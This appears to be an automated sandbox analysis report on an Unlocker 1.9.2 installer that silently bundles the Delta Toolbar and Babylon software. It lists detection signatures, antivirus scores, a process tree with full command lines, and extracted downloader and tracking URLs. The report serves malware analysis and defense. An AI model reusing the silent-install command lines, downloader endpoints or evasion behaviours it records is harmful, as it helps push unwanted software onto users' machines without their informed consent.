Windows Analysis Report
Unlocker1.9.2.exe

Overview

General Information

Sample Name:Unlocker1.9.2.exe
Analysis ID:810721
MD5:1e02d6aa4a199448719113ae3926afb2
SHA1:f1eff6451ced129c0e5c0a510955f234a01158a0
SHA256:fb6b1171776554a808c62f4045f5167603f70bf7611de64311ece0624b365397

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: rundll32 run dll from internet
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sample is not signed and drops a device driver
Contains functionality to register a low level keyboard hook
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Creates driver files
Registers a DLL
Creates or modifies windows services
Contains functionality to query network adapter information
Contains functionality to read data from the clipboard

Classification

  • System is w10x64
  • Unlocker1.9.2.exe (PID: 1500 cmdline: C:\Users\user\Desktop\Unlocker1.9.2.exe MD5: 1E02D6AA4A199448719113AE3926AFB2)
    • DeltaTB.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: EB2764885565B6C01CB32E5F51F213B3)
      • Setup.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: 26F6D1B6756A83DE9755A05F7C030D75)
        • rundll32.exe (PID: 1032 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • ielowutil.exe (PID: 2192 cmdline: "C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123 MD5: D1F5C3244A69511CAC88009B71884A71)
        • rundll32.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • setup.exe (PID: 5996 cmdline: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt MD5: 5790A04F78C61C3CAEA7DDD6F01829D2)
    • regsvr32.exe (PID: 4916 cmdline: C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 2148 cmdline: /s "C:\Program Files\Unlocker\UnlockerCOM.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
No configs have been found
No yara matches

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, CommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt, ParentImage: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe, ParentProcessId: 4132, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com, ProcessId: 1032, ProcessName: rundll32.exe
No Snort rule has matched

AV Detection

Source: Unlocker1.9.2.exe, ReversingLabs: Detection: 55%
Source: Unlocker1.9.2.exe, Virustotal: Detection: 43%
Source: Unlocker1.9.2.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe, ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exe, ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exe, Joe Sandbox ML: detected
Source: C:\Program Files\Unlocker\UnlockerInject32.exe, Joe Sandbox ML: detected
Source: Unlocker1.9.2.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Window detected: < &Back I &Agree Cancel Nullsoft Install System v2.46 License Agreement Please review the license terms before installing Unlocker 1.9.2. Press Page Down to see the rest of the agreement. A. Unlocker End User License Agreement B. Delta Toolbar End User License Agreement A. Unlocker End User License Agreement This software is provided "as is" without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs so use of this tool is at your own risk. We take no responsibility for any damage that may unintentionally be caused through its use. You may not distribute Unlocker in any form without express written permission of Cedrick Collomb (ccollomb@emptyloop.com) B. Delta Toolbar End User License Agreement You have the option of installing the Delta Toolbar. By Installing the Delta Toolbar you agree to Delta End-User Licence Agreement and Delta Privacy Statement. You can easily remove this application at any time. o Delta End-User Licence Agreement: http://info.delta-search.com/uninstall/eula.html o Delta Privacy Statement http://info.delta-search.com/uninstall/privacy.html If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Unlocker 1.9.2.
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, File created: C:\Program Files\Unlocker\README.TXT
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Unlocker
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\Unlocker.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\UnlockerDriver5.sys
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\UnlockerInject32.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\README.TXT
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\UnlockerCOM.dll
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\Unlocker.url
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Directory created: C:\Program Files\Unlocker\uninst.exe
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdb source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: Binary string: C:\projects\meitar-branch\SP_Meitar\Release_Win32\ReportUrlDll.pdb source: setup.exe, 00000006.00000000.352332785.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe, 00000006.00000002.353687641.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe.2.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdbp source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdbN source: Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\BExternal.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.351621352.000000000089D000.00000004.00000020.00020000.00000000.sdmp, BExternal.dll.1.dr, BExternal.dll.2.dr
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdbp;V source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdb source: DeltaTB.exe, 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, DeltaTB.exe, 00000001.00000000.339008902.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdbH source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Code function: 0_2_00405CD8 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Unlocker1.9.2.exe, Code function: 0_2_0040263E FindFirstFileA
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exe, Code function: 1_2_009A121F _wcscpy,_wcscpy,_wcscat,FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe, Code function: 2_2_0049F0E0 FindFirstFileW,FindClose
Source: Joe Sandbox View, IP Address: 184.154.27.232
00000000.00000003.323709911.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323362656.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://info.delta-search.com/uninstall/eula.html
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373598163.000000000019A000.00000004.00000010.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://info.delta-search.com/uninstall/privacy.html
Source: Unlocker1.9.2.exe, uninst.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Unlocker1.9.2.exe, uninst.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ocsp.thawte.com0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://search.babylon.com
Source: Setup.exe, 00000002.00000002.358963994.000000000017D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://stat.info-strea
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-strea/downloader.php?ver=9.1.1.10&affilID=122471&guid=
Source: Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&s
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&sSW:
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=111&ver=9.1.1.10&af
Source: Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&aff
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&af
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://stp.babylon.com/downloader.php?&lang=&zpb=1&second=1&geo=1about:blank:about:blankbfrNvgt:
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stp.babylon.com/downloader.php?ver=9.1.1.10&affilID=122471&guid=
Source: Setup.exeString found in binary or memory: http://stpui.babylon.com/
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://stpui.babylon.com/setup_cms_url?name=&param=&lang=%d&ver=%d&bld=%d&&ver=
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://tc.babylon.com/Ginger/correct
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tc.babylon.com/Ginger/correct1
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tcm.babylB
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://tcm.babylon.com/UM_Consumer/UMOpeartions
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://transurl.babylon.com
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Unlocker1.9.2.exe, 00000000.00000003.352261412.0000000005101000.00000004.00000020.00020000.00000000.sdmp, README.TXT.0.drString found in binary or memory: http://unlocker.emptyloop.com
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/)
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/????
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Accesso
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Acest
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Aquest
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ce
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Denegado
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Denne
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Detta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Dit
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Esta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Este
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/GET
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Juurdep
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ky
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Mesej
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Odm
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ova
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/P
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Pesan
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Poruka
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Pr
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Questo
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/See
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/T
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Tato
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/This
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/To
